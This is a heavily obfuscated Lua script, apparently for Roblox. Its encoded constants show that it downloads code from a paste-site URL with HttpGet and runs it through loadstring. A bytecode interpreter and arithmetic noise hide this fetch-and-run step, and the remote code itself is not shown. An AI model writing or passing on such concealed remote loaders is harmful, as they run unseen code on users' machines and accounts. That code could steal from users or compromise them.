--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v106=0;local v107;while true do if (v106==1) then return v107;end if (v106==0) then v107=v5(v88,v19);v19=nil;v106=1;end end else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((879 -(282 + 595)) -(1638 -(1523 + 114)))) -(v32-(620 -(555 + 64)))) + (932 -(771 + 86 + 74)))) ;return v89-(v89%((810 -241) -(367 + (1266 -(68 + 997))))) ;else local v90=(929 -(214 + 713))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(0 -(0 + 0))) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1;end if (v34==(1 + 0)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (959 -(892 + 65)) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 84 + 29)) ;return (v41 * 16777216) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(954 -((1232 -(44 + 386)) + 150))) then v47=v20(v44,56 -(1521 -(998 + 488)) ,(18 + 37) -24 );v48=((v20(v44,32)==(1 + 0)) and  -(1 + 0)) or 1 ;v42=1000 -(915 + 82) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==((775 -(201 + 571)) -0)) then if (v47==0) then if (v46==(1187 -(1069 + 118))) then return v48 * (0 -(1138 -(116 + 1022))) ;else v47=1 -0 ;v45=0 + (0 -0) ;end elseif (v47==(3636 -1589)) then return ((v46==(0 + 0)) and (v48 * ((792 -(368 + 423))/0))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/(2^(163 -111)))) ;end if ((19 -(10 + 8))==v42) then v45=3 -2 ;v46=(v20(v44,(261 + 182) -(416 + 26) ,63 -43 ) * ((1 + 1)^(56 -24))) + v43 ;v42=440 -(145 + (1069 -776)) ;end end end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==(0 -0)) then v51=nil;if  not v49 then local v114=859 -(814 + 45) ;while true do if (v114==(0 -(0 -0))) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=1;end if ((1 + 0)==v50) then v51=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;v50=887 -(261 + 624) ;end if (v50==(3 -1)) then v52={};for v108=1081 -(1020 + 60) , #v51 do v52[v108]=v2(v1(v3(v51,v108,v108)));end v50=1426 -(249 + 381 + 793) ;end if (3==v50) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 + 0 ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(698 -(208 + 490))) then local v115=(function() return 0;end)();local v116=(function() return;end)();while true do if (v115==0) then v116=(function() return 0 + 0 ;end)();while true do if (v116==(0 + 0)) then v92=(function() return v93();end)();v94=(function() return nil;end)();v116=(function() return 837 -(660 + 176) ;end)();end if ((1 + 0)==v116) then v91=(function() return  #"{";end)();break;end end break;end end end if ( #"]"==v91) then if (v92== #",") then v94=(function() return v93()~=(202 -(14 + 188)) ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92== #"xnx") then v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v54=(function() return function(v99,v100,v101) local v102=(function() return 0;end)();local v103=(function() return;end)();while true do if (v102~=(675 -(534 + 141))) then else v103=(function() return 0 + 0 ;end)();while true do if (v103~=(0 + 0)) then else v99[v100-#"/" ]=(function() return v101();end)();return v99,v100,v101;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"|",v59 do FlatIdent_781F8,Type,v21,Cons,v24,v25,v60,v68=(function() return v53(FlatIdent_781F8,Type,v21,Cons,v24,v25,v60,v68);end)();end v58[ #"-19"]=(function() return v21();end)();for v69= #":",v23() do local v70=(function() return 0;end)();local v71=(function() return;end)();while true do if (v70~=0) then else v71=(function() return v21();end)();if (v20(v71, #" ", #"|")~=0) then else local v120=(function() return 0;end)();local v121=(function() return;end)();local v122=(function() return;end)();local v123=(function() return;end)();while true do if (v120~=(3 -1)) then else if (v20(v122, #"!", #":")~= #"<") then else v123[2 -0 ]=(function() return v60[v123[2]];end)();end if (v20(v122,5 -3 ,2)~= #":") then else v123[ #"19("]=(function() return v60[v123[ #"91("]];end)();end v120=(function() return 2 + 1 ;end)();end if (v120==1) then local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if (v125==0) then v126=(function() return 0 + 0 ;end)();while true do if (0==v126) then local v164=(function() return 396 -(115 + 281) ;end)();while true do if (1==v164) then v126=(function() return 1;end)();break;end if ((0 -0)==v164) then v123=(function() return {v22(),v22(),nil,nil};end)();if (v121==0) then local v181=(function() return 0 -0 ;end)();local v182=(function() return;end)();while true do if (v181==0) then v182=(function() return 0 -0 ;end)();while true do if (v182==0) then v123[ #"xxx"]=(function() return v22();end)();v123[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v121== #"}") then v123[ #"nil"]=(function() return v23();end)();elseif (v121==2) then v123[ #"91("]=(function() return v23() -((869 -(550 + 317))^(22 -6)) ;end)();elseif (v121== #"xnx") then local v189=(function() return 0 -0 ;end)();local v190=(function() return;end)();while true do if (v189==0) then v190=(function() return 0 -0 ;end)();while true do if (v190==0) then v123[ #"-19"]=(function() return v23() -(2^(301 -(134 + 151))) ;end)();v123[ #"?id="]=(function() return v22();end)();break;end end break;end end end v164=(function() return 1666 -(970 + 695) ;end)();end end end if (v126==1) then v120=(function() return 3 -1 ;end)();break;end end break;end end end if ((1990 -(582 + 1408))==v120) then local v127=(function() return 0;end)();while true do if (v127==1) then v120=(function() return 3 -2 ;end)();break;end if (v127==(0 -0)) then v121=(function() return v20(v71,7 -5 , #"xxx");end)();v122=(function() return v20(v71, #"asd1",6);end)();v127=(function() return 1825 -(1195 + 629) ;end)();end end end if (v120~=3) then else if (v20(v122, #"19(", #"19(")~= #",") then else v123[ #"http"]=(function() return v60[v123[ #"0313"]];end)();end v55[v69]=(function() return v123;end)();break;end end end break;end end end for v72= #">",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 -(238 -(64 + 174)) ];local v66=v62[243 -(187 + 54) ];local v67=v62[3];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=(204 + 1224) -((60 -19) + 1386) ;local v78= -(781 -(162 + 618));local v79={};local v80={...};local v81=v12("#",...) -(1 + (336 -(144 + 192))) ;local v82={};local v83={};for v104=0 -0 ,v81 do if (v104>=v75) then v79[v104-v75 ]=v80[v104 + ((383 -(42 + 174)) -(122 + 44)) ];else v83[v104]=v80[v104 + (1 -0) ];end end local v84=(v81-v75) + 1 + 0 ;local v85;local v86;while true do local v105=1636 -(1373 + 263) ;while true do if (v105==(1001 -(451 + 549))) then if (v86<=((10 + 3) -6)) then if ((v86<=(1 + 2 + 0)) or (1155>2350)) then if (v86<=(1 -0)) then if (v86==((535 + 722) -(1043 + (1718 -(363 + 1141))))) then v83[v85[(1587 -(1183 + 397)) -5 ]]=v85[4 -1 ];else v83[v85[1386 -(746 + 638) ]]={};end elseif (v86==(1 + 1)) then local v135=0 -0 ;local v136;local v137;while true do if ((4029<=4853) and (v135==(341 -((663 -445) + 123)))) then v136=v85[1583 -(1535 + 46) ];v137=v83[v85[3]];v135=2 -1 ;end if ((v135==(581 -(361 + 219))) or (516>3434)) then v83[v136 + 1 + 0 + 0 ]=v137;v83[v136]=v137[v85[1 + 3 ]];break;end end else v83[v85[562 -(306 + 254) ]]=v64[v85[3]];end elseif ((4046>=3033) and (v86<=(1 + 4))) then if (v86>(7 -3)) then v83[v85[1469 -(899 + 568) ]]();else do return;end end elseif (v86==(4 + 2)) then local v140=0 + 0 ;local v141;local v142;local v143;local v144;while true do if (v140==(851 -(15 + 5 + 830))) then v78=(v143 + v141) -(1 + (1975 -(1913 + 62))) ;v144=0 -0 ;v140=605 -(268 + 335) ;end if ((v140==(290 -(60 + 230))) or (2719<=1447)) then v141=v85[574 -(426 + 92 + 54) ];v142,v143=v76(v83[v141](v13(v83,v141 + 1 + 0 ,v85[1459 -((746 -464) + 1174) ])));v140=812 -(569 + 242) ;end if (v140==(5 -3)) then for v176=v141,v78 do local v177=0;while true do if (v177==0) then v144=v144 + 1 + 0 ;v83[v176]=v142[v144];break;end end end break;end end else v83[v85[1026 -((2639 -(565 + 1368)) + (1195 -877)) ]]=v64[v85[1254 -(721 + 530) ]];end elseif ((v86<=(1282 -(945 + 326))) or (4134<3926)) then if ((v86<=(22 -13)) or (164>=2785)) then if (v86>(1559 -(1126 + 425))) then v83[v85[(1663 -(1477 + 184)) + 0 ]]();else local v147=700 -(271 + 429) ;local v148;while true do if ((0 + 0)==v147) then v148=v85[1502 -(1408 + 92) ];v83[v148]=v83[v148](v13(v83,v148 + (1087 -(461 + 625)) ,v78));break;end end end elseif ((v86==(1298 -(993 + 295))) or (525==2109)) then local v149=(0 -0) + 0 ;local v150;while true do if (v149==(1171 -(418 + 753))) then v150=v85[3 -(1 + 0) ];v83[v150]=v83[v150](v13(v83,v150 + 1 + 0 ,v78));break;end end else v83[v85[1 + 1 ]]={};end elseif (v86<=(4 + 9)) then if (v86==(4 + 8)) then do return;end else local v152=0;local v153;local v154;local v155;local v156;while true do if (v152==(531 -(406 + 123))) then for v178=v153,v78 do v156=v156 + (1770 -(1749 + 20)) ;v83[v178]=v154[v156];end break;end if ((33==33) and (((858 -(564 + 292)) -1)==v152)) then v78=(v155 + v153) -(2 -1) ;v156=0 + 0 ;v152=1324 -(1249 + 73) ;end if (v152==(0 + 0)) then v153=v85[(1 -0) + 1 ];v154,v155=v76(v83[v153](v13(v83,v153 + ((2272 -1518) -(239 + 514)) ,v85[2 + 1 ])));v152=1146 -(466 + 679) ;end end end elseif (v86>(33 -19)) then v83[v85[5 -3 ]]=v85[1903 -(106 + 1794) ];else local v159=v85[1 + 1 ];local v160=v83[v85[1 + (306 -(244 + 60)) ]];v83[v159 + (2 -1) ]=v160;v83[v159]=v160[v85[10 -6 ]];end v77=v77 + 1 + 0 ;break;end if ((3054<=4015) and (v105==(114 -(4 + 110)))) then v85=v73[v77];v86=v85[1];v105=1 -0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403233Q00682Q7470733A2Q2F66722Q656E6F74652E62697A2F7261772F6F6A793878387038736A00094Q00017Q001207000100013Q001207000200023Q00200E00020002000300120F000400044Q0006000200044Q000A00013Q00022Q00090001000100012Q00043Q00017Q00",v9(),...);
